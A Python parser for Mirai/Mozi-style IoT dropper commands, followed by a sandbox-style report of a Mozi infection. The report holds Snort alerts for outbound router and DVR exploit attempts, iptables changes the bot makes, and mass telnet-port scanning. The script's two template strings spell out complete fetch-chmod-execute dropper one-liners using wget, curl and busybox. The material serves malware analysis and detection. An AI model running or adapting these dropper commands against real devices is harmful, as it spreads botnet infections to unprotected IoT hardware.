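"""Parse a Mirai/Mozi-style dropper one-liner into structured fields.
Added example; the templates are from the report, the instance is constructed."""
import re
from urllib.parse import urlparse

TEMPLATE_BIN = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;"
    "chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'"
)
TEMPLATE_SH = (
    ">/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;"
    ">/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;"
    "wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;"
    "chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);"
    "sh bin.sh %s;/bin/busybox echo -e '%s'"
)


def instantiate(template, host, port, marker):
    """Fill the printf placeholders the way the bot would (constructed test input)."""
    return template.replace("%s:%d", "%s:%d" % (host, port)).replace("%s", marker)


# `>/dir/.x&&cd /dir`: create a probe file, and only cd there if that worked.
PROBE_RE = re.compile(r">(?P<dir>/[\w/]+)/\.x&&cd (?P=dir)")
# Any of the three fetch tools followed by an http(s) URL.
FETCH_RE = re.compile(r"(?:wget|curl -O|/bin/busybox wget) (https?://[^ ;|]+)")


def exec_method(payload, name):
    """How the dropped file is launched: 'sh <name>', './<name>' or None."""
    n = re.escape(name)
    if re.search(r"(?:^|[;&|(])\s*sh %s(?:\s|;|$)" % n, payload):
        return "sh"
    if re.search(r"(?:^|[;&|(])\s*\./%s(?:\s|;|$)" % n, payload):
        return "direct"
    return None


def parse_dropper(payload):
    """Return a dict describing the dropper, or None if the payload lacks the
    writable-directory probe loop or a fetch stage (i.e. is not this family)."""
    dirs = PROBE_RE.findall(payload)
    urls = FETCH_RE.findall(payload)
    if not dirs or not urls:
        return None
    first = urlparse(urls[0])
    name = first.path.rsplit("/", 1)[-1]
    return {
        "probed_dirs": dirs,
        "loader": (first.hostname, first.port),
        "fetch_urls": urls,
        "fetch_fallbacks": len(urls),
        "dropped_file": name,
        "chmod_fallback": "cp /bin/ls" in payload,   # exec bit borrowed from ls
        "tries_busybox": "/bin/busybox" in payload,
        "exec_method": exec_method(payload, name),
    }


if __name__ == "__main__":
    for tpl in (TEMPLATE_BIN, TEMPLATE_SH):
        print(parse_dropper(instantiate(tpl, "192.0.2.10", 8080, "MOZI_MARKER")))
```

In a honeypot pipeline the `loader` tuple is the field to pivot on: it is the host the victim is told to fetch from, which is usually a fresh bot rather than any fixed infrastructure, so collect it per capture instead of treating it as a stable indicator. Note also that the `probed_dirs` list includes /dev and /dev/shm, so a payload surviving in memory-backed filesystems is expected and a reboot can clear it; the persistence the signature list attributes to /etc/profile and System V runlevels is what keeps it coming back.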

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.114.71.142: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.169.237.142: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.229.187.191: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:38870 -> 151.139.241.251:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.162.120.168: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.20.247.252: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 79.199.18.39: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 194.81.6.182: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 218.248.175.197: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.89.22.107: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 12.91.239.157: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 166.127.254.2: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 81.171.22.94: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.141.42.51: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 36.89.55.95:6881 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 88.86.98.50: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:48066 -> 175.203.81.2:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.171.18:48131 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:42806 -> 144.76.43.37:80
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 149.11.89.129: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:35088 -> 23.254.64.88:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.97.168.156:5353 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 158.39.1.58: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 104.165.238.97: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:46030 -> 203.46.145.77:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.185.94.208: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.224.238.149: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:49398 -> 23.217.12.208:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.217.12.208:80 -> 192.168.2.20:49398
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:51358 -> 172.67.201.119:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60698 -> 159.140.205.214:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32828 -> 47.246.22.230:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.159.88.60: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 188.101.189.42: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.193.139.218: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 66.169.97.135: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:60198 -> 24.239.192.38:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:58988 -> 13.89.231.175:80
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:36372 -> 113.161.185.44:80
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:57414 -> 41.57.99.92:80
Source: Traffic, Snort IDS: 2027339 ET EXPLOIT Realtek SDK Miniigd UPnP SOAP Command Execution CVE-2014-8361 - Outbound 192.168.2.20:56274 -> 176.116.205.200:52869
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.167.162.206: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 154.85.22.47: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:48524 -> 193.248.153.76:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 178.141.70.255:1900 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:55086 -> 74.79.213.38:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 94.216.193.84: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.7.204.55: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:40316 -> 156.225.150.183:80
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 92.45.252.1: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:32776 -> 23.236.242.26:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:32776 -> 23.236.242.26:80
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 59.96.39.49:1027 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 91.96.55.112: -> 192.168.2.20:
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 193.50.198.5: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:54454 -> 23.12.191.118:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.12.191.118:80 -> 192.168.2.20:54454
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 80.255.14.222: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 131.100.27.86: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:59832 -> 23.53.160.36:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 23.53.160.36:80 -> 192.168.2.20:59832
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 77.7.89.221: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 149.28.33.22: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 213.222.29.194: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 93.221.222.106: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 116.68.99.187:63032 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 2030919 ET TROJAN Mozi Botnet DHT Config Sent 5.106.1.251:3317 -> 192.168.2.20:8987
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.149.61.90: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 63.148.112.178: -> 192.168.2.20:
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 212.149.148.17: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:39748 -> 2.22.143.222:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 2.22.143.222:80 -> 192.168.2.20:39748
Source: Traffic, Snort IDS: 486 ICMP Destination Unreachable Communication with Destination Host is Administratively Prohibited 172.241.192.161: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic, Snort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.20:33236 -> 180.254.107.55:80
Source: Traffic, Snort IDS: 2020899 ET EXPLOIT D-Link Devices Home Network Administration Protocol Command Execution 192.168.2.20:55722 -> 34.66.226.190:80
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:49434 -> 104.149.254.177:80
Source: Traffic, Snort IDS: 401 ICMP Destination Unreachable Network Unreachable 80.255.15.98: -> 192.168.2.20:
Source: Traffic, Snort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.146.71: -> 192.168.2.20:
Source: Traffic, Snort IDS: 2029215 ET EXPLOIT Netgear DGN1000/DGN2200 Unauthenticated Command Execution Outbound 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic, Snort IDS: 2024916 ET EXPLOIT Netgear DGN Remote Command Execution 192.168.2.20:53268 -> 104.103.19.232:80
Source: Traffic, Snort IDS: 1200 ATTACK-RESPONSES Invalid URL 104.103.19.232:80 -> 192.168.2.20:53268
Source: Traffic, Snort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:45072 -> 77.238.74.163:80
Source: Traffic, Snort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:45072 -> 77.238.74.163:80
              Source: TrafficSnort IDS: 2025576 ET EXPLOIT HackingTrio UA (Hello, World) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 2027063 ET EXPLOIT Outbound GPON Authentication Bypass Attempt (CVE-2018-10561) 192.168.2.20:37542 -> 176.119.128.106:80
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 87.155.20.45: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 178.27.214.206: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 84.141.215.230: -> 192.168.2.20:
              Source: TrafficSnort IDS: 485 ICMP Destination Unreachable Communication Administratively Prohibited 217.236.144.108: -> 192.168.2.20:
              Connects to many ports of the same IP (likely port scanning)
              Executes the "iptables" command to insert, remove and/or manipulate rules
              Source: /bin/sh (PID: 4638), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4670), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4674), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4718), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 60120 -j ACCEPT
              Source: /bin/sh (PID: 4737), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4747), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4772), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4793), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 60120 -j ACCEPT
              Source: /bin/sh (PID: 4813), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
              Source: /bin/sh (PID: 4816), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
              Source: /bin/sh (PID: 4825), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
              Source: /bin/sh (PID: 4847), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
              Source: /bin/sh (PID: 4895), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
              Source: /bin/sh (PID: 4918), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
              Source: /bin/sh (PID: 4945), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
              Source: /bin/sh (PID: 4966), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
              Source: /bin/sh (PID: 4985), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
              Source: /bin/sh (PID: 5004), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
              Source: /bin/sh (PID: 5022), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
              Source: /bin/sh (PID: 5042), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
              Source: /bin/sh (PID: 5060), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
              Source: /bin/sh (PID: 5079), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
              Source: /bin/sh (PID: 5097), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
              Source: /bin/sh (PID: 5118), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
              Source: /bin/sh (PID: 5219), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5222), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5226), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5242), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 8987 -j ACCEPT
              Source: /bin/sh (PID: 5265), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5288), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5314), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 8987 -j ACCEPT
              Source: /bin/sh (PID: 5338), Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 8987 -j ACCEPT
              Uses known network protocols on non-standard ports
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 64.60.156.172:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 170.28.13.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 69.148.51.105:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 94.119.137.8:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 78.58.120.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.31.207.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 169.247.212.103:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 86.1.120.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 201.145.205.246:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 176.17.112.147:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.249.225.38:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 54.126.72.39:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.220.37.255:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.124.19.178:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 9.119.106.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 125.196.149.212:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 218.52.94.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 206.22.158.92:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 149.165.201.122:2323
              Source: global trafficTCP traffic: 192.168.2.20:36286 -> 151.235.98.188:52869
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 70.142.209.180:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 19.67.205.237:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.232.197.142:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 145.214.33.95:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 161.26.89.62:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 62.190.128.79:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 197.86.174.173:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 114.99.17.241:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 189.179.160.80:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 91.223.186.181:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 34.126.231.244:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 57.97.159.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.34.224.22:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 164.100.155.219:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.145.169.30:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 77.206.48.106:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 102.86.201.96:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.66.190.127:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 171.82.232.134:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.134.142.150:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 76.120.94.75:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 126.39.183.239:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 204.15.252.204:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 60.19.190.113:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 24.111.17.40:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 180.58.196.188:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 23.141.250.44:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 221.104.222.102:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 174.231.155.97:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 13.111.18.70:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 18.132.143.23:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 207.221.231.94:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 74.156.135.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:32832 -> 72.116.52.243:8443
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 195.182.237.244:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 157.9.213.184:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 156.149.46.74:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 175.243.55.238:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 181.229.246.160:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 173.96.113.131:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 211.160.156.9:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.233.160.240:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 96.150.185.206:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 2.223.160.174:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 109.168.201.230:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 98.110.180.156:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.182.24.215:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 202.100.225.66:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 108.80.251.155:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 188.151.208.67:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 67.136.137.120:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.127.63.205:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 72.252.87.71:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 63.205.40.16:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 79.115.27.234:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 35.64.204.253:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 209.143.238.124:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 82.92.199.247:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 115.122.10.41:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 200.79.154.190:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 66.226.192.6:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 179.52.72.165:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 178.106.158.1:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 152.75.61.215:1023
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 99.146.105.31:2323
              Source: global trafficTCP traffic: 192.168.2.20:12122 -> 153.48.151.95:2323
